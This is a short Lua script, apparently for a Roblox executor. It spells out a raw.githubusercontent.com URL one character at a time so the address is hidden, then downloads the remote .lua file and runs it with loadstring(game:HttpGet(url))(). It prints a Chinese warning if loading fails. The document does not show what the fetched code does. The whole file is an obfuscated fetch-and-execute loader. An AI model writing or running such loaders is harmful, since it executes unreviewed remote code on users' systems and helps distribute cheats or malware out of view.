local data = {
	{1,"h"},
	{2,"t"},
	{3,"t"},
	{4,"p"},
	{5,"s"},
	{6,":"},
	{7,"/"},
	{8,"/"},
	{9,"r"},
	{10,"a"},
	{11,"w"},
	{12,"."},
	{13,"g"},
	{14,"i"},
	{15,"t"},
	{16,"h"},
	{17,"u"},
	{18,"b"},
	{19,"u"},
	{20,"s"},
	{21,"e"},
	{22,"r"},
	{23,"c"},
	{24,"o"},
	{25,"n"},
	{26,"t"},
	{27,"e"},
	{28,"n"},
	{29,"t"},
	{30,"."},
	{31,"c"},
	{32,"o"},
	{33,"m"},
	{34,"/"},
	{35,"t"},
	{36,"f"},
	{37,"c"},
	{38,"y"},
	{39,"g"},
	{40,"v"},
	{41,"u"},
	{42,"n"},
	{43,"b"},
	{44,"i"},
	{45,"n"},
	{46,"d"},
	{47,"/"},
	{48,"5"},
	{49,"5"},
	{50,"7"},
	{51,"/"},
	{52,"m"},
	{53,"a"},
	{54,"i"},
	{55,"n"},
	{56,"/"},
	{57,"%"},
	{58,"E"},
	{59,"8"},
	{60,"%"},
	{61,"8"},
	{62,"E"},
	{63,"%"},
	{64,"B"},
	{65,"7"},
	{66,"%"},
	{67,"E"},
	{68,"5"},
	{69,"%"},
	{70,"8"},
	{71,"F"},
	{72,"%"},
	{73,"9"},
	{74,"6"},
	{75,"%"},
	{76,"E"},
	{77,"7"},
	{78,"%"},
	{79,"9"},
	{80,"A"},
	{81,"%"},
	{82,"8"},
	{83,"4"},
	{84,"%"},
	{85,"E"},
	{86,"8"},
	{87,"%"},
	{88,"8"},
	{89,"4"},
	{90,"%"},
	{91,"9"},
	{92,"A"},
	{93,"%"},
	{94,"E"},
	{95,"6"},
	{96,"%"},
	{97,"9"},
	{98,"C"},
	{99,"%"},
	{100,"A"},
	{101,"C"},
	{102,"_"},
	{103,"2"},
	{104,"0"},
	{105,"2"},
	{106,"6"},
	{107,"0"},
	{108,"2"},
	{109,"1"},
	{110,"7"},
	{111,"_"},
	{112,"1"},
	{113,"0"},
	{114,"5"},
	{115,"2"},
	{116,"2"},
	{117,"0"},
	{118,"."},
	{119,"l"},
	{120,"u"},
	{121,"a"}
}

local url = ""

for i = 1, #data do
	url = url .. data[i][2]
end

local success, err = pcall(function()
	loadstring(game:HttpGet(url))()
end)

if not success then
	warn("脚本加载失败：" .. err)
end
